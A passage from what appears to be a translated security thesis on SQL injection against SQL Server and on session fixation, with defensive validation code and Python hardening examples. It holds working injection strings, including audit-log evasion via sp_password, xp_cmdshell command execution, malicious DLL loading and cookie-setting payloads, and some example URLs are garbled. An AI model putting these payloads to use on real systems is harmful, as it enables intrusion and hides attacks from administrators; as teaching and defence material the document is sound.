SQL Server has a thorough auditing mechanism, the sp_traceXXX family of functions, which can record many events occurring in the database; in particular, T-SQL events record every SQL statement executed on the server. If auditing is turned on, all of the hacker's SQL queries are recorded too, so an administrator can monitor what is happening and quickly find a solution. But there is also a way to counter this: by adding the string sp_password to the T-SQL statement, because when it encounters this string the audit records the following:
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
even when sp_password appears inside a comment.
So to hide all attacking queries, one simply appends sp_password after the -- as follows:
Username: admin'--sp_password
III.7.4. Using Extended Stored Procedures
III.7.4.1. Using the Extended Stored Procedures built into SQL Server
If SQL Server is installed with default settings, it runs under the SYSTEM account, equivalent to the highest Windows access level. master..xp_cmdshell can then be used to execute commands remotely:
; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try the double quote (") if the single quote (') does not work.
Below are some extended stored procedures that hackers commonly use to run commands that reveal information on the victim machine:
Xp_availablemedia: shows the drives currently present on the machine
Xp_dirtree: shows all directories, including subdirectories
Xp_loginconfig: retrieves information about the security mode on the server
Xp_makecab: lets the user create archive files on the server (of any file the server can access)
Xp_ntsec_enumdomain: lists the domains the server can query
Xp_terminate_process: terminates a process given its PID
III.7.4.2. Using self-made Extended Stored Procedures
The extended stored procedure API makes it a simple task to create an extended stored procedure DLL that contains dangerous code. The DLL file can be uploaded to the server with commands or with various communication techniques that run automatically, such as an HTTP download or an FTP script.
Once the DLL file exists on the server, the hacker can create an extended stored procedure with the following statement:
Example 6.III.7.4.2-1: sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
It can then be executed like an ordinary extended stored procedure:
exec xp_webserver
When finished, it can be removed with the following statement: sp_dropextendedproc 'xp_webserver'
III.7.4.3. Importing a text file into a table
The bulk insert command imports data from a text file into a temporary table.
Example 6.III.7.4.3-1: First create a simple table:
create table foo (line varchar(8000))
Then run bulk insert to copy the data from the file into the table:
Example 6.III.7.4.3-2:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
The contents of process_login.asp can then be read back with techniques such as the one in Example 6.III.7.4-3.
IV. COUNTERMEASURES
In most browsers, special characters should be encoded in the URL before they are used.
SQL injection attacks rely on the error messages the application returns, so the best countermeasure is still not to show those messages to the user: replace them with a page designed by the developer that is displayed whenever an error occurs in the application.
Check the values entered by the user and replace characters such as ; and so on.
Remove meta-characters such as ', ", /, \, ; and extended characters such as NULL, CR, LF, ... from strings received from:
o data entered by the user
o parameters in the URL
o values in cookies
For numeric values, convert them to integer before executing the SQL query, or use ISNUMERIC to make certain that the value is an integer.
Use an encryption algorithm to protect the data.
IV.1. Data validation
Validating data is a complex problem that is usually not given enough attention in applications. Data validation should not be seen as merely adding a few functions to the application; it has to be done in a general way if it is to reach its goal quickly.
The following summary discusses data validation, with sample examples illustrating the problem.
There are three approaches to the problem:
1) Try to check and modify the data to make it valid.
2) Reject invalid data.
3) Accept only valid data.
Approach 1: hard to implement.
First, the programmer does not necessarily know all the invalid data, because invalid data takes very many forms.
Second, there is the case of second-order SQL injection, where the data is read back out of the system.
Approach 2: fails in the same cases as approach 1, because invalid data keeps changing as new kinds of attack are developed.
Approach 3: better than the other two, but runs into some limitations in implementation.
The best protection is to combine approaches 2 and 3. One example of why combining 2 and 3 is necessary is the hyphen in the name Quentin Bassington-Bassington: the definition of valid data must allow the hyphen, yet the character sequence -- is a special sequence in SQL Server.
For example, a filter could:
remove invalid data such as --, select and union
A check function that only removes single quotes can be defeated as follows:
union select @@version--
Some basic ways of implementing data validation functions
Approach 1: Replace single quotes:
function escape( input )
    ' double every single quote so it stays inside the string literal
    input = replace(input, "'", "''")
    escape = input
end function
Approach 2: Reject invalid data
function validate_string( input )
    ' list of tokens that must not appear anywhere in the input
    known_bad = array( "select", "insert", "update", "delete", "drop", "--", "'" )
    validate_string = true
    for i = lbound( known_bad ) to ubound( known_bad )
        ' case-insensitive search; any hit rejects the whole input
        if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
            validate_string = false
            exit function
        end if
    next
end function
Approach 3: Accept only valid data
function validatepassword( input )
    ' only these characters are allowed in a password
    good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    validatepassword = true
    for i = 1 to len( input )
        c = mid( input, i, 1 )
        if ( InStr( good_password_chars, c ) = 0 ) then
            validatepassword = false
            exit function
        end if
    next
end function
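The three VBScript functions above, the integer conversion recommended in Section IV and the advice to hide database errors from the user, worked through together in one Python script. This is an added example written for this edition, not code from the thesis; the function names, the in-memory SQLite users table and the inputs are all constructed for the demonstration. It also goes one step beyond the text by placing a parameterised query beside the concatenated one, so the difference can be observed on the same inputs.

```python
"""Data validation and query construction for the three approaches of
Section IV.1, plus the numeric check and the parameterised query.
Added example; the table, names and inputs are constructed."""
import re
import sqlite3

# Approach 1 (the escape() function): double every single quote.
def escape_quotes(value: str) -> str:
    return value.replace("'", "''")

# Approach 2 (validate_string): reject input containing known-bad tokens.
KNOWN_BAD = ("select", "insert", "update", "delete", "drop", "--", "'")

def validate_string(value: str) -> bool:
    lowered = value.lower()
    return not any(bad in lowered for bad in KNOWN_BAD)

# Approach 3 (validatepassword): accept only characters on an allowlist.
GOOD_PASSWORD_CHARS = frozenset(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")

def validate_password(value: str) -> bool:
    return value != "" and all(c in GOOD_PASSWORD_CHARS for c in value)

# Numeric parameters: convert to int before the query. Anything that is not
# a plain integer literal is rejected rather than "repaired".
def to_int(value: str):
    if re.fullmatch(r"[+-]?\d{1,18}", value.strip()) is None:
        return None
    return int(value)

# Constructed in-memory users table for the query demonstration.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "S3cretPw"), (2, "alice", "alicePw1")])
    return db

# Vulnerable form: the query text is built by concatenation, so a quote in
# the input closes the literal and -- comments out the rest of the WHERE.
def find_user_concat(db, username: str, password: str) -> list:
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in db.execute(sql)]

# Numeric context: escaping quotes does nothing here, which is why the text
# asks for an integer conversion before the query is built.
def find_user_by_id_concat(db, id_text: str) -> list:
    sql = "SELECT username FROM users WHERE id = " + id_text + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

# Hardened form: placeholders keep the input as data, never as SQL syntax.
def find_user_param(db, username: str, password: str) -> list:
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]

# Error handling as Section IV recommends: the user never sees the database
# error text; the detail goes to a server-side log (a list here).
SERVER_LOG: list = []

def login(db, username: str, password: str, finder=find_user_param) -> str:
    try:
        rows = finder(db, username, password)
    except sqlite3.Error as exc:
        SERVER_LOG.append(f"login query failed: {exc}")
        return "Login failed"
    return f"Welcome {rows[0]}" if rows else "Login failed"
```

Run against the inputs from this chapter, escape_quotes() does stop admin'-- in a quoted context but not 2 OR 1=1 in a numeric one; validate_string() rejects the double hyphen in Bassington--Bassington exactly as the text warns; only find_user_param() returns no row for admin'-- without any filtering at all.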
IV.2. SQL Server lockdown
The thesis also introduces a protection method at the database administration level.
Here is a checklist of tasks for protecting SQL Server:
Determine the methods used to connect to the server:
o Use the Network Utility to check that only the network libraries actually in use are enabled.
Check all the accounts in SQL Server
o Create only low-privilege accounts for applications
o Remove accounts that are not needed
o Make sure that every account has a valid password
Check the objects that exist
o Many extended stored procedures can be deleted safely. If this is done, also consider removing the .dll files that contain the code of those extended stored procedures
o Delete all sample databases such as northwind and pubs
o Delete unused stored procedures such as master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
Check which accounts can access which objects
o For the accounts an application uses to access the database, grant only the minimum privileges needed to reach the objects it uses.
Check the server's patch level
o Some attacks, such as buffer overflows and format strings, target this layer of protection.
Check the sessions on the server
Change "Startup and run SQL Server" to a low-privilege user account in SQL Server Security.
Remarks:
- Chapter 6 shows that checking data before processing it is necessary.
- Besides validating the data, the application should encrypt data inside the database and should not output a Web page that reports an error with SQL syntax in it, so that the hacker cannot gather information about the database.
- In parallel there is the work of the network administrator.
Chapter 7
SESSION TAKEOVER
Contents:
I. Overview of the session ID
II. Session fixation
III. Session hijacking
CHAPTER 7: SESSION TAKEOVER
I. OVERVIEW OF THE SESSION ID
As mentioned in Chapter 2, Section III, a session is used to store the working state between the browser and the server. The session ID can be stored in a cookie, embedded in the URL, or kept in a hidden form field.
Each storage method has advantages and disadvantages, but in practice the cookie is still the best choice and the safest method.
Usually, after the user has been authenticated by personal information such as username/password, the session ID is treated as a temporary static password for the requests that follow. This makes the session ID a major target for hackers. In many cases a hacker obtains a user's valid session ID in order to break into that user's session.
XSS is also an attack that can obtain a session ID stored in a cookie. This attack is called session hijacking.
Attacks on a session are usually carried out in two main ways:
Session fixation
Session hijacking
II. SESSION FIXATION
In a session fixation attack, the hacker fixes the session ID for the victim in advance, before the victim logs in to the system. The hacker then uses this session ID to break into the victim's session.
Summary of the attack:
Step 1: Establish a session ID.
Systems manage sessions in one of two ways:
+ Permissive: accept any session ID; if no session with that ID exists yet, create a new one.
+ Restrictive: accept only session IDs that were registered beforehand.
With a permissive system the hacker need only choose any session ID, remember it, and reuse it later. With a restrictive system the hacker must register a session ID with the application.
Depending on how sessions are managed, the hacker has to keep the session alive until the victim logs in. Normally a session does not live forever: the system automatically destroys a session if no action is performed for some time (the idle time) or when a fixed lifetime expires.
Therefore, in step 1a, the attacker maintains the session by sending requests to the server.
Figure 7.II-1: Overview of the attack on a user using the session fixation technique
Step 2: Send this ID to the victim's browser.
The hacker sends the newly created session ID to the user; depending on the application, the session ID may be passed through the URL, a hidden form field or a cookie. The common attack methods are:
o Attacking the session ID in a URL parameter.
o Attacking the session ID in a hidden form field.
o Attacking the session ID in a cookie.
Step 3: Break into the victim's session.
Once the victim has logged in to the system with the pre-set session ID and has not yet left the application, the hacker starts using that session ID to enter the victim's session.
Figure 7.II-2: Detailed description of the session fixation attack on a user.
Next, the thesis presents the ways of attacking the session ID used in step 2.
II.1. Attacking the session ID in a URL parameter
The hacker sends a link that asks the user to log in to the server, with a session ID already fixed in the URL.
Example 7.II.1-1:
http://online.worldbank.com/login.jsp?sessionid=1234
Figure 7.II.1-1: Attack through a URL parameter
1. The hacker opens the bank's online service at online.worldbank.com.
2. The hacker receives a session ID from the server identifying the hacker's session, for example the value 1234.
3. The hacker then finds a way to send a link to some user who has an account at this bank. The link usually points to the bank's account login page, for example http://online.workbank.com/login.jsp?sessionid=1234, and tricks the user into working inside the hacker's session once the user receives it.
4. The user falls for it and opens the Web application through the hacker's link. Because a session ID (the hacker's) is already present, the server does not create a new one.
5. The user goes on to log in with their own credentials to manage their account.
6. The hacker can now enter the user's account without logging in, because both share the same session.
Remark: this attack requires the application to create the session ID as soon as the user starts using the application. It is easy for the user to detect.
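The permissive/restrictive distinction from step 1 and the six-step scenario above, replayed against a small server-side session store in Python. This is an added example, not the thesis's code or that of any real application; SessionStore, its method names, the clock injection and the constructed IDs are assumptions made for the demonstration. The store honours only IDs it issued itself, drops idle sessions, and replaces the ID when the user authenticates, which is what leaves the hacker with nothing in step 6.

```python
"""Session handling that resists the fixation scenario of Section II:
the server accepts only IDs it issued (the restrictive model) and rotates
the ID at login. Added example; names and IDs are constructed."""
import secrets
import time


class SessionStore:
    def __init__(self, idle_timeout: float = 900.0, clock=time.time):
        self.idle_timeout = idle_timeout   # seconds of inactivity allowed
        self.clock = clock                 # injectable for deterministic tests
        self._sessions = {}                # sid -> {"user": ..., "last": ...}

    @staticmethod
    def _new_id() -> str:
        # 256 bits from the OS CSPRNG: a short value like 1234 is never issued
        return secrets.token_urlsafe(32)

    def start(self) -> str:
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last": self.clock()}
        return sid

    def resolve(self, presented):
        """Map the ID the browser presented (URL, hidden field or cookie)
        to the session used for this request. An unknown ID, i.e. one
        planted by a third party but never issued here, or an idle-expired
        ID is discarded and a fresh anonymous session is started, so the
        permissive 'adopt any ID' behaviour never occurs."""
        entry = self._sessions.get(presented) if presented else None
        if entry is None:
            return self.start()
        if self.clock() - entry["last"] > self.idle_timeout:
            del self._sessions[presented]
            return self.start()
        entry["last"] = self.clock()
        return presented

    def login(self, sid: str, user: str) -> str:
        """Rotate the ID at the authentication boundary: whoever learned
        the pre-login ID (step 2) cannot reach the authenticated session
        (step 3), even when that ID was a genuine one the server issued."""
        self._sessions.pop(sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "last": self.clock()}
        return new_sid

    def user_of(self, sid: str):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None


def fixation_scenario() -> dict:
    """Replays the six-step scenario of Section II.1 and reports what the
    hacker ends up with. Times are a constructed clock, not real time."""
    now = [1000.0]
    store = SessionStore(idle_timeout=900.0, clock=lambda: now[0])
    hacker_sid = store.start()                    # steps 1-2: hacker gets a real ID
    victim_sid = store.resolve(hacker_sid)        # step 4: victim arrives with that ID
    victim_sid = store.login(victim_sid, "victim")  # step 5: victim authenticates
    planted = store.resolve("1234")               # an ID never issued by the server
    now[0] += 1000.0                              # later than the idle timeout
    return {
        "hacker_sees_victim": store.user_of(hacker_sid) == "victim",   # step 6
        "victim_id_rotated": victim_sid != hacker_sid,
        "planted_id_adopted": planted == "1234",
        "expired_id_rejected": store.resolve(victim_sid) != victim_sid,
    }
```

The rotation in login() is the decisive control: the restrictive check in resolve() alone does not help in II.1, because the hacker obtained a legitimately issued ID in step 2, so the server must make that ID worthless the moment the victim authenticates.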
II.2. Attacking the session ID in a hidden form field
This technique resembles the hidden-form-field technique: after viewing the HTML source of the page and noticing that the session ID is kept in a hidden form field, the hacker sends the user either a session ID in the URL or a Web page that looks like the original but whose hidden form field carries the pre-set value.
Remark: this method is also impractical and is as easy to detect as the previous one.
II.3. Attacking the session ID in a cookie
By exploiting cookies, the hacker has three ways of delivering a session ID to the victim's browser:
Use a scripting language (JavaScript, VBScript, ...) to set a cookie in the victim's browser.
Use a <meta> tag to set the Set-Cookie attribute.
Use Set-Cookie in the HTTP response header.
Specifically:
a) Setting a cookie in the browser with a scripting language:
Most browsers support client-side scripting languages such as JavaScript and VBScript. Both languages can set a cookie in the browser by assigning a value to document.cookie.
Example 7.II.3-1:
http://online.workbank.com/document.cookie= sessionid=1234; domain= .workbank.com;.idc
Besides that, the hacker can set the lifetime and the domain of the cookie; this approach suits permissive systems. For example, every host under .workbank.com can read the value of this cookie.
b) Using the <meta> tag with the Set-Cookie attribute:
The application can also set a cookie in the browser with a <meta> tag in the HTML.
Example 7.II.3-2:
<meta http-equiv="Set-Cookie" content="sessionid=1234">
Meta tag injection:
On systems that check the arguments for the tag, the XSS technique runs into many difficulties, so adding a <meta> tag is a fairly effective method for manipulating cookies. Normally the <meta> tag is placed inside the <head> section,
but it can still be processed if it is placed anywhere in the HTML page.
Example 7.III-3:
http://online.workbank.dom/.idc
This method has an advantage over XSS in that it is not defeated in IE (which can disallow scripting languages in the browser), except for the tag
c) Setting the cookie with Set-Cookie in the HTTP response header:
This method sets a cookie in the browser by using Set-Cookie in the HTTP header, through a DNS server attack technique,
II.4. Countermeasures
First, it should be made clear that preventing this kind of session fixation attack is not the responsibility of the Web server, because the server only provides the session management API to the application. Therefore,